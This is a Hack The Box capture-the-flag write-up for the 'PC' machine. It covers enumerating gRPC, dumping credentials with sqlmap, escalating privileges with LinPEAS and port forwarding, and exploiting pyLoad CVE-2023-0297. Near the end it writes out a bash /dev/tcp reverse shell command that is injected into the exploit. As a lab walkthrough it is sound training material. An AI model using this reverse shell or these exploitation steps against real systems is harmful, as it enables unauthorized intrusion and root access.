Hack The Box - PC

June 20, 2023


PC is a Linux machine with an open port running gRPC (Google Remote Procedure Call). Interaction with the server using grpcui allows for the creation of a new user on the system. Interception of a POST request to the /invoke/SimpleApp.getInfo endpoint can be used to run SQLMap, resulting in a database dump of username and passwords which can be leveraged to SSH into the system. Further scanning using LinPEAS reveals the presence of several active ports. Viewing a page on port 8000 uncovers that the server is running pyLoad, a download manager software. The current version of pyLoad running on the machine is vulnerable to arbitrary code injection (CVE-2023-0297) which can be used to get a root shell.

nmap scan:

nmap scan

Open ports:

  • 22 (SSH)
  • 50051 (unknown)

I tried connecting to port 50051 with netcat which then showed these non-printable characters: ▒?��?�� ?

Eventually the connection timed out with an error message:

netcat HTTP/2 error

I did a google search for "http2 port 50051" which brought up some results related to gRPC. Then, I found that the default port for gRPC is 50051. So, I looked for a tool that could be used to interact with gRPC which led to grpcui, an interactive web UI for the gRPC protocol:


grpc web ui

Three methods can be used on this service:

  • LoginUser
  • RegisterUser
  • getInfo

I registered a new user and logged in which provided me with an id and token. I sent a request to getInfo using the given id and token which responded with the message "Will update soon."

Then, I intercepted this request with burp suite to get a better idea of the structure:

burp request getInfo

Assuming that the server was using some type of SQL database, I ran sqlmap on the above request to check for SQLi. The output showed that the server was using SQLite and resulted in a database dump of usernames and passwords:


I was able to SSH into the system as user sau. This is where the user flag can be found:

user flag

Next, I started up a local python server so I could download LinPEAS on the target system:

python3 -m http.server

Downloaded LinPEAS with wget:

wget linpeas

After enumerating with LinPEAS, the most interesting results were the active ports:

linpeas active ports

I forwarded port 1234 on my machine to port 8000 on the target machine to see what was running:

port forward

This brought up a page running pyLoad:


I searched for "pyload vulnerability" on google which led me to the CVE-2023-0297 mentioned on snyk Vulnerability DB (Arbitrary Code Injection) and features the this POC.

snyk CVE-2023-0297 (click image to enlarge)

The current version running on the machine is before the patch:

pyLoad version

So, I started a listener with netcat:


Then, I edited the exploit code featured in the POC to contain a URL encoded reverse shell command within the system() function.

Reverse shell command:

\"/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'\"

URL encoded:


Sent the payload:


Obtained a root shell:


CTF Writeups | InfoSec Topics

Written by Mike Garrity

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